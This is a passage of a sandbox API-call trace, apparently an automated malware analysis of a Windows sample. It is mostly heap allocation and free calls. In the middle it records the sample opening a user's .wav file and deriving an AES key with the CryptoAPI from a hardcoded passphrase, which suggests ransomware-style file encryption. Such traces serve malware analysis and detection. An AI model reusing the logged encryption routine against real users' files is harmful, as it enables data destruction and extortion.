HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0118.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0118.027] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca1c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0118.028] CloseHandle (hObject=0x258) returned 1 [0118.028] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.028] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0118.028] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38ea4ef0, ftCreationTime.dwHighDateTime=0x1d5e0e5, ftLastAccessTime.dwLowDateTime=0x944918e0, ftLastAccessTime.dwHighDateTime=0x1d5e53a, ftLastWriteTime.dwLowDateTime=0x944918e0, ftLastWriteTime.dwHighDateTime=0x1d5e53a, nFileSizeHigh=0x0, nFileSizeLow=0xb9fc, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="lJ_RJDQgish84bCgxK.wav", cAlternateFileName="LJ_RJD~1.WAV")) returned 0x41ac700 [0118.028] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0118.028] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0118.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0118.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0118.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0118.029] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0118.029] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0118.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.029] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0118.030] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.030] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0118.030] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0118.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.030] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0118.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0118.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0118.030] CryptHashData (hHash=0x41ac600, pbData=0x17e27e8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0118.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.031] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0118.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca910, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0118.031] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac640) returned 1 [0118.031] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0118.031] CryptDestroyHash (hHash=0x41ac600) returned 1 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0118.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0118.032] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0118.032] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0118.032] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0118.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0118.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0118.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0118.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0118.033] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\lj_rjdqgish84bcgxk.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0118.033] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.033] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0118.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0118.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0118.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0118.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0118.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0118.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.033] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0118.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0118.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0118.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0118.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0118.040] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0118.040] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0118.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0118.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0118.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 